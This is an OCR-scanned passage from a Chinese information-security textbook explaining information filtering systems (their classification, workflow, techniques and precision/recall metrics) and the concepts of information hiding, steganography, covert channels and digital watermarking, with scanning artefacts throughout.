用 户 感 兴趣 的 信息 ,屏蔽 无 用 的 信息 ,用 户 的 信息 需求 行为 是 一 个 长 期 行为 。 可 见 ,IR 实 
现 不 需要 了 解 用 户 的 相关 信息 ,适合 多 数 用 户 短期 使 用 ,而 IF 需要 了 解 用 户 的 相关 信息 ， 
得 到 用 户 的 需求 模型 ,适合 少数 用 户 长 期 使 用 。 

除 此 之 外 ,需要 区 分 与 IF 密切 相关 的 另外 几 个 概念 ,如 信息 分 类 (Information 
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Classification,IC) 和 信息 抽取 (Information Extraction,IE)。 简 单 而 言 , 某 些 场合 下 人 们 
所 称 的 IF 实际 就 是 一 个 IC 问题 . 即 判断 信息 是 否 符合 用 户 需 求 可 看 作 是 一 个 两 类 (是 / 
否 ) 的 分 类 问题 。 一 般 而 言 ,IC 中 的 分 类 范畴 通常 不 会 变化 ,而 IF 的 用 户 需 求 会 动态 调 
整 。 至 于 IE 一 般 直接 从 自然 语言 文本 中 抽取 事实 信息 ,并 以 结构 化 的 形式 描述 信息 , 比 
如 抽取 鸭 怖 事件 发 生 的 时 间 、 地 点 、 人 物 等 字段 。 其 不 太 关注 相关 性 ,而 只 关注 相关 的 字 
段 ;而 IF 需要 关注 相关 性 。 

信息 过 滤 系 统 (Information Filtering System,IFS) 是 指 支持 信息 过 滤 过 程 而 设计 的 
自动 化 系统 。 一 般 地 ,IFS 具有 以 下 特点 : 系统 处 理 对 象 是 半 结 构 化 或 非 结构 化 数据 ， 
主要 是 文本 信息 ; @ 主 要 处 理 将 要 到 达 的 数据 流 ; @@ 用 户 需求 过 滤 模 板 一 般 情 况 下 是 静 
态 的 ; @ 过 滤 意 味 着 从 即将 到 来 的 数据 流 中 排除 数据 ,而 不 是 从 数据 流 中 发 现 数 据 。 

2. 信息 过 滤 系统 的 分 类 

根据 不 同 的 目的 ,信息 过 滤 系统 有 不 同 的 分 类 方式 。 

(1) 按 网 络 数据 捕获 方式 。 根 据 第 2 章 , 将 网 络 信息 内 容 获取 方式 分 为 了 主动 信息 
内 容 获取 和 被 动 信息 内 容 获取 ,其 中 主动 信息 内 容 获取 主要 通过 搜索 引擎 技术 实现 网 页 
信息 的 抓 取 ; 被 动 信息 内 容 获取 通过 网 络 数据 捕获 实现 。 因 此 ,根据 网 络 信息 内 容 的 捕获 
方式 不 同 ,信息 过 滤 系 统 可 划分 为 主动 数据 搜集 式 过 滤 系 统 和 被 动 数据 获取 式 过 滤 系 统 。 
其 中 ,主动 数据 搜集 式 过 滤 系 统 根 据 用 户 需 求 模型 主动 为 用 户 搜集 相关 信息 ,然后 将 相关 
信息 推送 给 用 户 ;而 被 动 数 据 获取 式 过 滤 系 统 不 需要 收集 数据 ,通常 应 用 于 电子 邮件 或 新 
闻 组 过 滤 。 

(2) 按 过 滤 操作 的 位 置 分 类 。 按 信息 过 滤 系统 所 在 的 操作 位 置 ,可 分 为 : 信息 源 过 
滤 系 统 、 信 息 过 滤 服 务 器 过 滤 系 统 和 用 户 端 过 滤 系统 。 具 体 而 言 , 信 息 源 过 滤 系统 ,又 称 
剪辑 服务 (Clipping Service) 系 统 ,是 指 用 户 将 用 户 需 求 模型 提交 给 一 个 信息 提供 者 ,由 其 
为 用 户 提供 与 过 滤 模 型 相 匹 配 信 息 , 如 Dialog 提供 的 Alert 服务 。 信 息 过 滤 服务 器 系统 
是 指 信 息 提供 者 将 信息 提交 给 服务 器 ,同时 用 户 将 用 户 需 求 模型 提交 给 该 服务 器 ,服务 器 
通过 这 些 信 息 实 现 信息 过 滤 , 并 将 相关 信息 发 给 用 户 , 如 Stanford 在 1994 年 开发 的 
SIFT 系统 。 用 户 端 系统 过 滤 是 指 对 流 经 本 地 的 信息 进行 评估 ,过滤 掉 不 相关 的 信息 ,如 
Outlook 邮件 过 滤 。 

(3) 按 过 滤 的 方法 分 类 。 按 照 过 滤 的 方法 ,信息 过 滤 系 统 可 分 为 认 知 过 滤 系 统 、 社 会 
过 滤 系 统 、 基 于 效用 的 过 滤 系 统 、 基 于 智能 代理 的 信息 过 滤 等 ,其 中 认 知 过 滤 系 统 和 社会 
过 滤 系 统 是 两 种 常用 的 过 滤 系 统 。 

具体 而 言 , 认 知 过 滤 系 统 , 又 称 基 于 内 容 的 信息 过 滤 系统 ,Malone 等 定义 :“ 采 用 一 
种 机 制 ,描述 信息 内 容 和 用 户 需 求 模型 特征 ,然后 用 这 些 描述 智能 化 地 将 信息 与 用 户 需 求 
进行 匹配 ”社会 协作 过 滤 系 统 ,又 称 基 于 协同 过 滤 的 信息 过 滤 系 统 ,是 指 利用 用 户 之 间 的 
相似 的 兴趣 或 相同 的 知识 来 构建 用 户 需求 模型 ,从 而 进行 信息 过 滤 和 信息 推荐 。 其 与 认 
知 推荐 系统 的 不 同 之 处 在 于 不 是 基于 信息 内 容 , 而 是 基于 其 他 用 户 的 使 用 模式 。 除 此 之 
外 ,还 有 一 些 过 滤 系 统 , 如 基于 效用 的 过 滤 系 统 是 利用 成 本 -效益 评价 和 价格 机 制 实现 信 
息 过 滤 。 基 于 智能 代理 的 信息 过 滤 系 统 是 通过 引入 的 智能 代理 自动 修改 用 户 需 求 模型 并 
自动 地 进行 相关 的 过 滤 操 作 。 
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(4) 按 获 取 用 户 知识 的 方式 分 类 。 按 照 用 户 知识 的 获取 方法 可 分 为 显 式 知识 获取 过 
滤 系统 、 隐 式 知 识 获取 过 滤 系 统 以 及 显 隐 混合 知识 获取 过 滤 系 统 。 显 式 过 滤 系统 需要 用 
户 的 直接 参与 ,通过 提问 或 填 表 等 方式 获取 用 户 的 信息 需求 ,然而 ,由 于 语言 表达 问题 ,用 
户 往 往 不 能 找到 合适 的 关键 词 来 表达 真实 的 需求 ,从 而 影响 过 滤 系统 的 准确 度 。 隐 式 知 
识 获取 过 滤 系 统 是 在 不 打扰 用 户 的 前 提 下 ,通过 观测 用 户 行 为 ,如 阅读 文档 时 间 次数、 上 
下 文 . 行 为 (保存 .删除 .打印 \ 点 击 等 ) 等 ,然后 采用 机 器 学 习 方 法 来 获取 用 户 的 信息 需求 。 
显 隐 混 合 知识 获取 过 滤 系 统 是 综合 使 用 显 式 知 识 获 取 过 滤 系统 和 隐 式 知识 获取 过 滤 
系统 。 

(5) 按 信息 过 滤 的 工具 分 类 。 按 照 所 使 用 的 过 滤 工 具 , 信 息 过 滤 系 统 可 分 为 : 专门 
的 过 滤 软 件 系统 、 网 络 应 用 程序 过 滤 系统 、 防 火 墙 过 滤 系 统 、 代 理 服务 器 过 滤 系 统 、 旁 路 方 
式 过 滤 系 统 。 专 门 的 过 滤 软 件 系统 是 为 过 滤 网 络 信息 专门 开发 的 软件 。 网 络 应 用 程序 过 
滤 系 统 是 利用 应 用 程序 所 具有 的 过 滤 功 能 ,如 Web 浏览 器 .搜索 引擎 .电子 邮件 等 。 防 火 
墙 过 滤 系统 通过 设置 IP 地 址 和 端口 等 实现 进入 数据 包 的 过 滤 。 代 理 服 务 器 过 滤 系 统 是 
在 客户 机 和 服务 器 之 间 增 加 一 个 代理 服务 器 ,通过 配置 代理 服务 器 实现 信息 进出 控制 。 
旁 路 方式 过 滤 系 统 通 过 获取 进出 局 域 网 的 所 有 信息 ,通过 相应 的 内 容 过 滤 处 理 , 对 于 网 址 
和 信息 控制 。 与 代理 服务 器 过 滤 系 统 相 比 , 这 种 方法 对 用 户 的 网 速 不 造成 影响 。 

3. 信息 过 滤 系统 的 工作 流程 

信息 过 滤 系统 的 一 般 模型 可 抽象 为 图 10-11 所 示 , 主 要 包括 四 个 基本 的 组 件 : 数据 
分 析 组 件 、 过 滤 组 件 、 用 户 需求 模型 组 件 和 学 习 组 件 。 


反馈 


(4) 学 习 组 件 用 户 信息 提供 者 
相 
更 B33 关 信 
新 E> 人 奶 
(3) 用 户 需 求 用 户 需 求 模型 本 被 表示 的 信息 人 
模型 组 件 (2) 过 滤 组 件 ( 机 


10-11 信息 过 滤 系 统一 般 模型 


(1) 数据 分 析 组 件 。 从 信息 提供 者 那里 获取 或 收集 信息 (如 文档 ,消息 ) ,对 信息 进行 
分 析 并 抽取 其 中 特征 信息 ,以 适当 的 数据 形式 (如 空间 向 量 ) 来 表示 ,表示 结果 将 被 输入 到 
过 滤 组 件 中 。 

(2) 过 滤 组 件 。 过 滤 组 件 是 信息 过 滤 系 统 的 核心 ,主要 用 来 计算 信息 源 与 用 户 需 求 
模型 的 相关 度 。 相 关 度 可 以 通过 一 个 二 值 数据 表示 , 即 相关 或 不 相关 ;也 可 以 通过 对 一 个 
文本 的 评分 ,一 般 采 用 概率 表示 。 过 滤 组 件 可 应 用 于 一 条 单独 的 信息 ,如 一 封 电子 邮件 ; 
也 可 以 应 用 于 一 组 信息 ,如 文档 集合 。 然 后 将 过 滤 的 结果 发 送 给 用 户 , 用 户 是 信息 相关 性 
的 最 终 决 策 者 ,其 决策 的 结果 可 反馈 给 学 习 组 件 。 当 前 ,过 滤 组 件 采 取 相 似 性 度量 方法 很 
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大 程度 上 取决 于 文本 表示 模型 ,在 前 面 已 经 介绍 了 常见 的 文本 表示 模型 ,如 基于 集合 论 的 
模型 .基于 代数 论 的 模型 和 基于 概率 的 模型 。 除 此 之 外 ,一 些 基于 机 器 学 习 的 方法 ,如 支 
持 向 量 机 SVM 最 近邻 分 类 法 、 基 于 贝 叶 斯 的 方法 等 也 可 用 于 文本 表示 。 当 前 ,典型 的 文 
本 信息 与 用 户 需求 模型 的 匹配 技术 包括 : 基于 关键 字 匹 配 、 余 弦 相 似 性 度量 .基于 范例 的 
推理 ,朴素 贝 叶 斯 分 类 器 、 最 近邻 参照 分 类 一些 典型 的 分 类 算法 (如 神经 网 络 、 决 策 树 、 归 
纳 规 则 和 贝 叶 斯 网 络 等 ) 等 。 

(3) 用 户 需 求 组 件 。 用 户 需求 模型 组 件 通过 显 式 或 隐 式 的 搜集 用 户 的 信息 生成 用 户 
需求 模型 ,并 将 用 户 需求 模型 传递 给 过 滤 组 件 。 因 为 过 滤 的 主要 目的 是 根据 用 户 需求 模 
型 来 判断 信息 与 用 户 需求 的 相关 度 , 因 此 如 果 有 效 的 描述 用 户 需求 模型 是 信息 过 滤 系 统 
要 解决 的 一 个 关键 问题 。 若 用 户 需 求 模型 不 准确 ,将 会 直接 导致 过 滤 结 果 的 偏差 和 错误 。 
文献 [42,43] 中 将 用 户 模 型 分 成 了 4 类 ,具体 如 图 10-12 所 示 。 


用 户 需 求 模型 


按 建 模 对 象 按 信息 源 按时 间 尺 度 按 更 新 方式 


[ 组 用 户 ] | 单 用 户 | | 显 式 | | 隐 式 长 期 | | 短期 静态 | | 动态 
图 10-12 用 户 需求 模型 分 类 


此 外 ,文献 [42J 给 出 了 当前 常见 的 用 户 需 求 建 模 方 法 : 用 户 手 工 创建 用 户 模型 、 系 统 
创建 用 户 模型 .用 户 和 系统 相 结 合 的 建 模 方法 、 基 于 人 工 神 经 网 络 学 习 用 户 模型 .基于 用 
户 版 型 导出 用 户 模型 和 基于 规则 的 用 户 建 模 等 。 

(4) 学 习 组 件 。 考 虑 到 建立 和 更 改 用 户 需求 模型 的 困难 性 ,信息 过 滤 系 统 中 通过 增 
加 一 个 学 习 组 件 能 更 好 地 提供 过 滤 模 型 ,提高 过 滤 系统 性 能 ;和 否则 ,不 精确 的 用 户 模型 将 
影响 过 滤 结 果 。 学 习 组 件 通 过 发 现 用 户 兴趣 变化 ,强化 、 弱 化 或 取消 现存 有 关 用 户 的 知 
识 , 来 更 新 用 户 模型 。 

当前 ,常见 的 学 习 方法 包括 : 观察 学 习 、 反 馈 学 习 和 用 户 训练 学 习 等 。 观 察 学 习 是 指 
将 导致 动作 (保留 或 抛弃 ) 发 生 的 条 件 记 录 下 来 。 当 新 的 情况 发 生 时 ,就 与 已 经 记录 下 来 
的 情况 相 比 较 , 从 而 决定 是 否 采取 某 种 行动 。 反 馈 学 习 是 指 通 过 用 户 直 接 或 间接 地 提供 
反馈 ,来 预测 新 的 信息 的 相关 度 。 用 户 训练 学 习 是 指 通 过 模拟 某 种 情景 ,用 户 对 系统 做 出 
相应 的 操作 来 构建 一 个 情景 数据 库 。 当 要 采取 什么 行动 时 ,系统 就 使 用 所 构建 的 情景 数 
据 库 进 行 推断 。 

4. 信息 过 滤 系 统 的 关键 技术 

在 上 面 介绍 了 信息 过 滤 系 统 的 基本 工作 流程 ,然而 ,由 于 组 件 之 间 是 相互 关联 的 , 因 
而 单独 的 描述 每 个 部 件 的 实现 技术 缺乏 可 操作 性 。 这 里 以 文献 [40] 中 提出 的 两 种 信息 过 
滤 技 术 为 例 进行 介绍 。 

(1) 基于 统计 学 理论 的 信息 过 滤 系 统 。 在 该 系统 中 ,用 户 需求 模型 和 信息 均 可 用 向 
量 空间 模型 表示 ,过滤 组 件 采用 统计 算法 计算 用 户 需求 模型 与 信息 的 相似 性 ,最 常见 的 可 
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采用 夹 角 余弦 。 若 要 评估 大 量 的 信息 , 则 可 对 计算 得 到 的 相似 性 结果 进行 排序 。 学 习 组 
件 要 求 用 户 决定 过 滤 结果 是 否 相关 得 到 相应 反馈 ,通过 采用 反馈 学 习 方式 来 更 新 用 户 需 
求 模型 ,主要 更 新 用 户 的 特征 项 及 其 权重 。 

(2) 基于 知识 的 过 滤 系 统 。 在 该 系统 中 ,主要 基于 知识 论 ,本体 论 等 中 的 相关 知识 ， 
如 请 义 网 、 神 经 网 络 .产品 规则 等 ,实现 信息 过 滤 , 主 要 包括 : 基于 规则 的 过 滤 系统 基于 
语义 网 络 的 过 滤 系 统 、 基 于 神经 网 络 的 过 滤 系 统 和 基于 遗传 学 算法 的 过 滤 系 统 等 。 

基于 规则 的 过 滤 系 统 中 用 户 需 求 模型 和 过 滤 组 件 都 是 由 一 组 规则 组 成 。 若 规则 被 满 
足 , 则 系统 能 够 运行 ,规则 命令 过 滤 组 件 将 信息 滤 掉 或 保留 下 来 。 若 新 到 来 的 信息 是 半 结 
构 化 的 , 则 将 规则 应 用 于 信息 的 结构 化 部 分 ; 若 新 到 来 的 信息 是 非 结构 化 的 , 则 必须 对 非 
结构 化 数据 进行 推导 。 然 而 基于 规则 的 过 滤 系 统 中 的 规则 随 着 时 间 的 增长 ,需要 动态 进 
行 更 新 。 基 于 语义 网 络 的 过 滤 系 统 通过 将 语义 信息 引入 到 用 户 需求 模型 和 过 滤 组 件 中 ， 
可 提高 过 滤 的 准确 率 。 

5. 信息 过 滤 系 统 的 评估 指标 

目前 ,没有 统一 评估 信息 过 滤 系 统 有 效 性 的 标准 。 这 是 因为 对 过 滤 系 统 而 言 ,不 仅 针 
对 信息 内 容 , 还 包括 用 户 的 兴趣 内涵、` 用 户 理解 等 不 同 的 因素 ,从 而 造成 对 过 滤 结果 评价 
的 不 同 。 常 用 的 评估 指标 包括 : 查 准 率 和 查 全 率 ,其 中 查 准 率 是 指 所 有 过 滤 出 的 信息 中 ， 
与 实际 过 滤 判 断 的 结果 一 致 的 信息 所 占 的 比例 ;而 查 全 率 是 指 能 够 将 实际 判断 应 该 过 滤 
出 来 的 所 有 信息 均 识 别 出 来 。 

对 于 集合 大 小 为 N 的 信息 集合 ,实际 与 用 户 需求 相关 的 集合 大 小 为 M。 通 过 过 滤 组 
件 进行 过 滤 , 若 已 经 通过 过 滤 的 n 条 相关 信息 中 ,有 m 条 与 用 户 需 求 是 相关 的 , 即 是 符合 
用 户 需 求 模型 的 , 则 有 n 一 m 条 是 与 用 户 需 求 不 相关 的 ,具体 见 表 10-3 所 示 。 


表 10-3 实例 
相关 不 相关 总 数 
已 通过 过 滤 m n—m n 
未 通过 过 滤 M—m N—n—M+m N—n 
M N 一 M N 


则 查 准 率 和 查 全 率 可 分 别 计算 如 下 : 
(1) 查 准 率 (Precision) 
p 已 通过 过 滤 中 相关 信息 集合 大 小 __ 
已 通过 过 滤 集 合 大 小 n 
(2) 查 全 率 (Recall) 


已 通过 过 滤 中 相关 信息 集合 大 小 _m 
信息 源 中 实际 相关 的 信息 集合 大 小 M 


除 此 之 外 ,信息 过 滤 系 统 的 其 他 衡量 指标 还 有 响应 时 间 、 拒 绝 率 、 效 用 平均 精度 等 。 
1042 信息 隐藏 技术 


当前 ,信息 内 容 具 有 数字 化 、 多 样 性 、 易 复制 、. 易 分 发 .交互 性 等 特点 极 大 地 方便 了 对 


第 10 章 ， 信 息 内 容 安全 


信息 内 容 的 操作 ;同时 开放 的 互联 网 环境 为 信息 内 容 传播 提供 了 有 效 的 途径 ,有 效 地 促进 
了 信息 交换 与 信息 共享 。 然 而 ,这 种 便捷 的 操作 和 传播 方式 在 便利 人 们 生活 和 工作 的 同 
时 ,也 给 敏感 信息 保护 和 知识 产权 保护 带 来 极 大 的 挑战 ,如 非法 用 户 对 信息 内 容 的 穷 取 、 
泄密 和 算 改 ,以 及 在 未 经 授权 的 情况 下 复制 和 传播 有 版 权 的 信息 内 容 等 。 可 见 , 如 何 实现 
信息 内 容 的 安全 传输 及 版 权 保护 已 成 为 信息 内 容 安全 的 一 个 重要 部 分 。 为 了 有 效应 对 这 
种 挑战 ,信息 隐藏 (Information Hiding,IH) 和 数字 水 印 (Digital Watermark ) 技术 应 运 
而 生 。 

本 节 首 先 介绍 信息 隐藏 技术 的 基本 概念 ,重点 阐述 其 与 密码 学 之 间 的 关系 ;然后 介绍 
信息 隐藏 技术 的 原理 、 分 类 、 特 征 及 应 用 场景 ;最 后 介绍 信息 隐藏 技术 的 重要 分 支 数字 水 
印 的 相关 理论 。 

1. 信息 隐藏 技术 的 基本 概念 

信息 隐藏 技术 是 研究 如 何 将 某 一 机 密 信息 秘密 地 隐藏 于 公开 传输 的 媒介 信息 中 ,使 
人 难以 察觉 到 机 密 信 息 的 存在 ,然后 通过 公开 媒介 信息 的 传输 来 传递 隐藏 的 信息 ,其 中 公 
开 媒 介 信息 既 可 以 是 数字 媒体 信息 ,如 图 像 .视频 .音频 ,也 可 以 是 一 般 性 文本 。 巾 于 含有 
隐藏 信息 的 媒介 信息 是 公开 发 布 的 ,并 且 攻 击 者 难以 从 公开 信息 中 检测 隐藏 信息 是 否 存 
在 ,更 难以 截获 隐藏 的 信息 ,从 而 在 一 定 程度 上 保障 信息 的 安全 传输 。 

密码 学 和 信息 隐藏 是 信息 安全 领域 两 大 重要 的 分 支 ,但 两 者 之 间 有 些 差别 ; 

(1) 信息 传输 方式 不 同 : 密码 学 中 的 加 密 技术 主要 研究 如 何 通过 数学 变换 将 机 密 信 
息 编 码 成 不 可 识别 的 密 文 信息 。 然 而 ,加 密 后 的 信息 更 容易 引起 攻击 者 的 注意 ,攻击 者 可 
通过 截获 密 文 , 对 其 进行 破译 或 者 将 密 文 进 行 破坏 后 发 送 , 从 而 影响 私密 信息 的 安全 性 。 
对 于 信息 隐藏 而 言 , 其 目标 是 要 使 得 攻击 者 难以 从 公开 的 媒介 信息 中 检测 是 否 有 私密 信 
息 的 存在 ,难以 截获 机 密 信 息 , 从 而 能 保证 机 密 信息 的 安全 。 

(2) 信息 保护 的 形式 和 时 间 不 同 : 加 密 技 术 通过 使 攻击 者 无 法 从 密 文 中 获取 机 密 信 
息 而 达到 信息 安全 保护 的 目的 ,因此 无 法 解决 网 络 传输 中 的 版 权 保护 问题 。 一 方面 ,加 密 
技术 将 信息 内 容 编码 成 无 法 理解 的 密 文 形 式 , 阻 碍 了 信息 内 容 的 传播 和 交流 ; 另 一 方面 ， 
加 密 技术 针对 的 是 传输 过 程 中 或 其 他 的 加 密 状 态 的 信息 安全 问题 ,一 旦 信息 内 容 被 解密 
后 ,其 对 信息 内 容 的 保护 也 就 消失 ,从 而 无 法 防止 信息 内 容 的 非法 复制 和 传播 ,也 就 均 失 
了 对 信息 内 容 数字 版 权 的 保护 。 

尽管 加 密 技 术 和 信息 隐藏 存在 如 上 不 同 , 但 是 加 密 技 术 和 信息 隐藏 两 者 都 是 实现 信 
息 安 全 的 重要 手段 ,两 者 并 不 矛盾 。 在 有 些 情 况 下 ,信息 隐藏 技术 会 用 到 加 密 技术 ,通过 
先 加 密 机 密 信息 ,然后 把 类 似 乱 码 的 机 密 信 息 用 嵌入 算法 隐藏 到 公开 媒介 中 ,可 实现 更 好 
的 安全 性 。 

2. 信息 隐藏 技术 模型 

信息 之 所 以 能 够 隐藏 在 公开 媒介 信息 中 ,主要 是 因为 : 一 方面 ,多 媒体 信息 本 身 存 在 
较 大 的 元 余 性 ,从 信息 论 角度 看 ,未 压缩 的 多 媒体 信息 的 编码 效率 是 很 低 的 ,所 以 将 某 些 
信息 嵌入 到 多 媒体 信息 中 进行 秘密 传送 是 可 行 的 ,并 不 会 影响 多 媒体 本 身 的 传输 和 使 用 。 
另 一 方面 ,人 眼 或 人 耳 本 身 的 生理 局 限 性 对 某 些 信息 不 敏感 。 利 用 人 的 这 些 特 点 ,可 以 较 
好 地 将 信息 隐藏 而 不 被 察觉 。 
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在 介绍 信息 隐藏 技术 模型 之 前 , 先 给 出 一 些 专 业 术 语 : 在 信息 隐藏 技术 中 ,被 隐藏 的 
信息 称 为 隐秘 信息 ;用 于 嵌入 隐秘 信息 的 媒介 信息 称 为 载体 ;嵌入 隐秘 信息 之 后 的 载体 称 
为 伪装 介质 ;将 隐秘 信息 嵌入 进 载体 得 到 伪装 介质 的 过 程 称 为 蔡 入 过 程 , 对 应 的 算法 称 为 
嵌入 算法 ;通过 处 理 伪装 介质 得 到 隐秘 信息 的 过 程 称 为 提取 过 程 , 对 应 的 算法 称 为 提取 算 
法 ;嵌入 过 程 和 提取 过 程 中 所 使 用 的 密 钥 分 别称 为 戏 入 密 钥 和 提取 密 钥 ,由 密 钥 分 发 中 心 
来 提供 。 

典型 的 信息 隐藏 技术 模型 如 图 10-13 所 示 , 主 要 由 嵌入 算法 和 提取 算法 构成 。 


密 钥 分 发 中 心 


载体 Cl 嵌入 密 钥 K) 提取 密 钥 K; 载体 Cl 
M, M。 1 S M。 MI 
信息 =| _ 预 处 理 =| 嵌入 算法 =| “传输 信道 ~| 提取 算法 =| 后 处 理 =| ”消息 
攻击 者 载体 C> 


图 10-13 ”信息 隐藏 技术 模型 


隐秘 信息 M 在 加 密 、 数 据 压缩 或 其 他 预 处 理 操作 之 后 得 到 的 中 间 信 息 M; ;然后 在 
敌人 算法 和 嵌入 密 钥 K, 的 作用 下 ,将 Ms 嵌入 到 载体 C, 中 ,得 到 嵌入 隐秘 信息 的 伪装 介 
质 S;S 通过 公共 传输 信道 发 送 给 接收 方 ,攻击 者 可 在 传输 信道 处 窃听 或 截获 传输 的 信 
息 ; 接 收 方 在 收 到 传输 过 来 的 伪装 介质 S 之 后 ,利用 提取 算法 和 提取 密 钥 K; ,可 能 也 需要 
使 用 载体 Ci ,从 S 中 提取 中 间 消 息 M。 和 得 到 载体 C: ;在 后 处 理 阶 段 利用 先前 预 处 理 的 
逆 过 程 将 Ms 恢复 成 隐秘 信息 M 。 为 了 能 有 效 提 取 所 嵌入 的 信息 ,通信 双方 需要 事先 协 
商 好 所 采用 的 算法 和 密 钥 。 若 嵌入 时 密 钥 K, 与 提取 时 密 钥 K。 相等 , 则 为 对 称 IH 算法 ; 
反之 为 非 对 称 IH 算法 。 在 提取 过 程 中 ,可 使 用 原始 载体 Ci ,也 可 以 不 使 用 载体 Ci , 若 提 
取 时 不 使 用 原始 载体 C, , 则 称 为 讶 检测 ;反之 则 称 为 非 讶 检测 。 若 原始 载体 C, 与 恢复 的 
载体 C* 相等 , 则 为 无 损 IH 模型 ,又 称 可 逆 IH 模型 ;反之 为 有 损 IH 模型 。 

3. 信息 隐藏 技术 分 类 

按照 不 同 的 标准 ,信息 隐藏 技术 有 不 同 的 分 类 方法 。 最 典型 的 信息 隐藏 技术 分 类 如 
图 10-14 所 示 ,IH 被 划分 为 : 

(1) 隐蔽 信道 。 隐 蔽 信道 (Covert channels) 是 指 允 许 进程 以 危害 系统 安全 策略 的 方 
式 传输 信息 的 通信 信道 。 目 前 ,对 其 有 多 种 不 同 的 定义 方式 ,较为 常见 的 是 Tsai 等 的 定 
义 : 给 定 一 个 强制 安全 策略 M 及 其 在 一 个 操作 系统 中 的 介绍 TCM) , 则 TCM) 中 的 两 个 主 
体 1(S;) 和 (S,) 之 间 的 通信 和 是 隐蔽 的 , 当 且 仅 当 模 型 M 中 的 对 应 主体 S; 和 S, 之 间 的 任 
何 通信 都 是 非法 的 。 可 以 看 出 ,隐蔽 通道 只 与 系统 的 强制 访问 策略 模型 相关 ,并 且 广 泛 地 
存在 于 部 署 了 强制 访问 控制 机 制 的 安全 操作 系统 、 安 全 网 络 和 安全 数据 库 中 。 

(2) 隐 写 术 。 隐 写 术 (Steganography) 是 信息 隐藏 技术 的 重要 分 支 之 一 ,主要 研究 如 
何 隐藏 实际 存在 的 隐秘 信息 。 一 般 地 , 隐 写 术 可 分 为 语言 隐 写 术 和 技术 隐 写 术 , 其 中 语言 
隐 写 术 是 利用 语言 本 身 的 特性 ,将 隐秘 信息 隐藏 在 文本 中 ,例如 藏 头 诗 ; 技 术 隐 写 术 是 将 
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语言 隐 写 术 技术 隐 写 术 和 鲁 棒 性 版 权 标识 ”脆弱 性 版 权 标识 


| 
指纹 水 印 


不 可 见 水 印 可 见 水 印 
图 10-14 ”信息 隐藏 技术 分 类 


隐秘 信息 进行 技术 处 理 后 隐藏 到 载体 中 ,使 得 隐秘 信息 不 易 被 察觉 ,同时 也 不 影响 载体 信 
息 的 使 用 ,例如 使 用 不 可 见 墨水 给 报纸 上 的 某 些 字 母 加 上 标记 向 间谍 发 送信 息 等 。 

(3) 匿名 。 匿 名 (Anonymity) 是 通过 隐藏 信息 通信 的 主体 , 即 信息 的 发 送 者 和 接收 
者 ,来 达到 信息 隐藏 。 不 同情 况 下 的 应 用 决定 了 匿名 的 对 象 , 即 是 匿名 发 送 者 ,抑或 是 匿 
名 接收 者 ,还 是 两 者 都 要 匿名 。 例 如 , Web 应 用 比较 强调 接收 者 的 匿名 性 ,而 电子 邮件 用 
户 则 更 关心 发 送 者 的 匿名 性 。 

(4) 版 权 标识 。 版 权 标识 (Copyright marking) 是 实现 信息 内 容 产品 版 权 保护 的 一 种 
有 效 技术 , 即 是 将 证 明 版 权 所 有 者 的 信息 嵌入 到 信息 内 容 产品 中 以 达到 版 权 保 护 的 目的 ， 
可 分 为 鲁 棒 性 版 权 标识 和 脆弱 性 版 权 标识 ,其 中 和 鲁 棒 性 版 权 标识 主要 用 来 在 信息 内 容 产 
品 中 标识 版 权 信 息 ,要 求 能 抵御 一 般 的 信息 处 理 , 如 滤波 缩放、 旋转 、 裁 前 和 有 失真 压缩 
等 ,以 及 一 些 恶 意 的 攻击 ;脆弱 性 版 权 标 识 嵌 入 信息 量 和 提取 阔 值 都 很 小 ,很 小 的 变化 就 
足以 破坏 版 权 标识 信息 ,一 般 用 来 对 信息 内 容 产品 做 真 伪 鉴 别 以 及 完整 性 校 验 。 根 据 标 
识 内 容 和 采用 的 技术 ,可 将 鲁 棒 性 版 权 标识 分 为 指纹 技术 和 水 印 技术 ,其 中 指纹 技术 是 为 
了 避免 未 经 授权 的 复制 和 发 行 ,出 版 商 可 将 不 同 序列 号 作为 不 同 指纹 嵌入 信息 内 容 产品 
的 合法 复制 中 ,一 旦 发 现 未 经 授权 的 非法 复制 ,可 通过 恢复 指纹 确定 其 来 源 ; 水 印 技术 是 
将 特制 的 标记 ,利用 数字 内 嵌 的 方法 嵌入 到 信息 内 容 产品 中 ,用 来 证 明 作者 对 其 作品 的 所 
有 权 。 根 据 水 印 的 外 观 可 分 为 : 不 可 见 水 印 和 可 见 水 印 。 

除 此 之 外 ,信息 隐藏 技术 按照 其 他 的 标准 ,还 有 不 同 的 分 类 方式 : 

(1) 根据 信息 隐藏 技术 的 载体 类 型 分 类 : 文本 信息 隐藏 技术 .图 像 信息 隐藏 技术 、. 音 
频 信 息 隐藏 技术 .视频 信息 隐藏 技术 等 。 

(2) 根据 髋 入 域 分 类 : 时 域 (空域 ) 信 息 隐藏 技术 和 频 域 (变换 域 ) 信 息 隐 藏 技术 ,其 
中 时 域 信息 隐藏 技术 是 直接 用 待 隐藏 的 信息 替换 载体 信息 中 的 宛 余部 分 。 频 域 信息 隐藏 
技术 是 将 待 隐藏 的 信息 嵌入 到 载体 的 一 个 变换 空间 (如 频 域 ) 中 ,具体 内 容 将 在 后 面 进行 
介绍 。 

4. 信息 隐藏 技术 特征 

根据 信息 隐藏 技术 的 目的 和 技术 要 求 , 信 息 隐 藏 技术 具有 如 下 特征 : 

(1) 鲁 棒 性 (Robustness) : 指 载体 不 因 某 种 攻击 或 改动 而 导致 隐藏 信息 丢失 的 能 力 ， 
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是 衡量 信息 隐藏 技术 性 能 的 重要 指标 。 

(2) 不 可 检测 性 (Undetectability) : 要 求 嵌 入 隐秘 信息 的 载体 与 原始 载体 之 间 具 有 
一 致 性 。 由 于 信息 隐藏 技术 主要 通过 伪装 的 方式 提高 信息 的 安全 性 ,因此 在 嵌入 隐秘 信 
息 后 ,要 求人 们 的 感觉 器 官 是 不 可 感知 的 ,同时 使 用 统计 方法 也 无 法 检测 到 载体 上 嵌入 的 
隐秘 信息 。 

(3) 嵌入 容量 (Capacity): 在 单位 时 间 内 或 在 一 个 载体 内 最 多 榜 入 信息 的 比特 数 。 
在 满足 惧 入 隐秘 信息 到 载体 的 质量 前 提 下 ,应 尽 可 能 地 提高 嵌入 容量 。 这 样 一 方面 可 以 
骨 入 尽量 多 的 隐秘 信息 ; 另 一 方面 可 采用 纠 错 编码 等 技术 降低 提取 信息 的 误 码 率 。 

(4) 透明 性 (Invisibility): 经 过 一 系列 隐藏 处 理 , 目 标 数据 在 质量 上 没有 明显 的 降 
低 , 但 隐藏 的 数据 却 无 法 人 为 的 看 见 或 听见 。 

